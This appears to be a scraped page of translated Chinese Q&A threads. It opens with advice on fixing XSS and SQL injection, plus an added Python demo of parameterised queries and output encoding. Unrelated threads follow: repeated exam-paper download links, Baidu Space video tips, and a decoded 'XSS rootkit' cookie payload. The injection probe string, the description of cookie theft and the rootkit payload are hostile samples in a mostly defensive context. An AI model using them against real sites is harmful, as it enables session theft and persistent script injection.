A vulnerability scanner says the website I built has some kind of XSS cross-site scripting vulnerability. How do I fix it? Could some expert take a look!!
I can't see any XSS on this page of yours, but there may well be a SQL injection vulnerability. The Title variable needs to be filtered; otherwise a user could change the content of Title, for example insert a single quote followed by their own SQL statement, which would let them read database contents they shouldn't see, i.e. an injection vulnerability. So you need to filter the data users submit and strip out all the special characters. Search Baidu for "ASP anti-injection" (asp防注入); there is source code available.
XSS: suppose I'm the attacker. I change one of the submitted variables to 'aaaaaaaaaaaa' (POST or GET both work, since you receive it with Request), then look at where 'aaaaaaaaaaaa' is echoed back on the page. If it shows up, I can try adding “” and so on to break your HTML structure; if it can be broken, then I can insert JavaScript code “script src=.../script” to steal users' cookies (so cookies should preferably be HttpOnly only), and combined with BeEF even operate the user's browser (with very limited privileges and functionality, don't get carried away).
To sum up, when you write your source code you must check all data users can modify and submit (including cookies and other HTTP headers), and do proper encoding at the output points. Controlling input and output well saves you a lot of trouble.
You can also use the cloud WAF services offered by companies like Anquanbao (安全宝) and Knownsec (知道创宇); then the data users submit is checked by them, and they give you CDN acceleration as well. Note: don't expose your real IP on the Internet. Some people only set up DNS for www.test.com and not for test.com, which leaves the real IP exposed online.
Or use an open-source CMS. I don't know the ASP ones; for PHP I know WordPress, whose code is written very well. As long as you update the version regularly and don't casually download plugins (plugins are submitted by other people, whose programming skill isn't necessarily good), there usually won't be any big vulnerabilities. Plugins also need updating regularly.
To guard against attacks from neighbouring sites on the same host, be careful when choosing a hosting provider (pick a big, reputable one). With something like Amazon, each site's permissions are locked down very tightly, so privilege escalation is very hard.
As for social engineering, security is a mindset; cultivate it over time. That's all I know; I hope it helps.
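The two fixes the answer recommends, a parameterised query instead of pasting Title into the SQL and HTML-encoding at the output point plus an HttpOnly session cookie, as an added example that is not from the original thread. The `articles` table, the `sid` cookie name and the probe value are constructed for the demo.

```python
# Added example (not from the original thread). Shows the two fixes the answer
# recommends, applied to a "Title" value taken from the request:
#   1. parameterised SQL instead of string concatenation,
#   2. HTML-encoding at the output point, plus an HttpOnly session cookie.
import html
import sqlite3


def make_db():
    """Constructed sample database standing in for the site's article table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("hello", "public post"), ("draft", "not published yet")],
    )
    return conn


def find_by_title_unsafe(conn, title):
    """The pattern the answer warns about: Title pasted straight into the SQL text."""
    sql = "SELECT title FROM articles WHERE title = '" + title + "'"
    return [row[0] for row in conn.execute(sql)]


def find_by_title_safe(conn, title):
    """Parameterised query: the driver sends Title as data, never as SQL."""
    sql = "SELECT title FROM articles WHERE title = ?"
    return [row[0] for row in conn.execute(sql, (title,))]


def render_title(title):
    """Encode at the output point so a Title cannot alter the HTML structure."""
    return "<h1>" + html.escape(title, quote=True) + "</h1>"


def session_cookie_header(name, value, max_age=3600):
    """Set-Cookie with HttpOnly so document.cookie cannot read the session id."""
    return f"Set-Cookie: {name}={value}; Max-Age={max_age}; Path=/; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    db = make_db()
    probe = "hello' OR '1'='1"  # constructed: a single quote followed by attacker SQL
    print(find_by_title_unsafe(db, probe))  # concatenation: every title comes back
    print(find_by_title_safe(db, probe))  # parameter: no row has that literal title
    print(render_title("aaaaaaaaaaaa<script>"))  # angle brackets become &lt; and &gt;
    print(session_cookie_header("sid", "constructed-session-id"))
```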
Questions about the urban planning postgraduate entrance exam at Southwest Jiaotong University
Southwest Jiaotong University past postgraduate entrance exam papers
链接: https://pan.baidu.com/s/1xSsaaj1vr0gMv9c6MkWjMg
Extraction code: vy2z
If there is a problem with the resource, feel free to ask again
Which subjects are tested in the second-round exam for the accounting master's programme at Southwest Jiaotong University?
Southwest Jiaotong University past postgraduate entrance exam papers
链接: https://pan.baidu.com/s/1xSsaaj1vr0gMv9c6MkWjMg
Extraction code: vy2z
If there is a problem with the resource, feel free to ask again
Can you put videos on Baidu Space? How?
Yes, you can. The simple way is to add, under background music, the link address of a music file that has video; mind the format, it has to follow the rules or it won't work, e.g. ending in WMV. Here are a few video links:
http://zhidao.baidu.com/question/10415769.html?si=1
If you want to add the video to the page, that is also possible; *** please see:
http://hi.baidu.com/jmdcw/blog/item/3ef49451d8f5c219377abeb9.html
Bounty 100 points, plus 20 more. A problem about converting *** and ASCII codes into letters; the code is below. Please work out what the converted letters say
Result:
Persistence_data='"scriptalert(/xss rootkit!/)/scriptx="';
var date=new Date();
var expireDays=365;
date.setTime(date.getTime()+expireDays*24*3600*1000);
document.cookie='gotopage='+Persistence_data+';expires='+date.toGMTString();
alert('Xss Rootkit Install Successful !!!!');
*** :
textarea name=xxxx/textarea
How do I put a video from my computer into my Baidu Space!!
First upload the clip to one of those video sites; search Baidu and you'll find loads
You need to register first; after uploading you get the address
Add the following code to the CSS
Video insertion ***: when writing a new post, enter the URL you want to insert, e.g. http://tv.mofile.com/cn/xplayer.swf?v=9IWKFISE,
cancel the automatic link the system adds, then apply italics, and that's it!
Which subjects make up the professional course exam for the computer science postgraduate entrance exam at Southwest Jiaotong University?
Southwest Jiaotong University past postgraduate entrance exam papers
链接: https://pan.baidu.com/s/1xSsaaj1vr0gMv9c6MkWjMg
Extraction code: vy2z
If there is a problem with the resource, feel free to ask again
How do I add effects or video code to a post in Baidu Space?
Add the following code to the CSS
Video insertion ***: when writing a new post, enter the URL you want to insert, e.g. http://tv.mofile.com/cn/xplayer.swf?v=9IWKFISE,
cancel the automatic link the system adds, then apply italics, and that's it!
If you want something more advanced (how to change the width and height and suchlike), see here: http://hi.baidu.com/huge/blog/item/a99c8c5479ec641f3a293572.html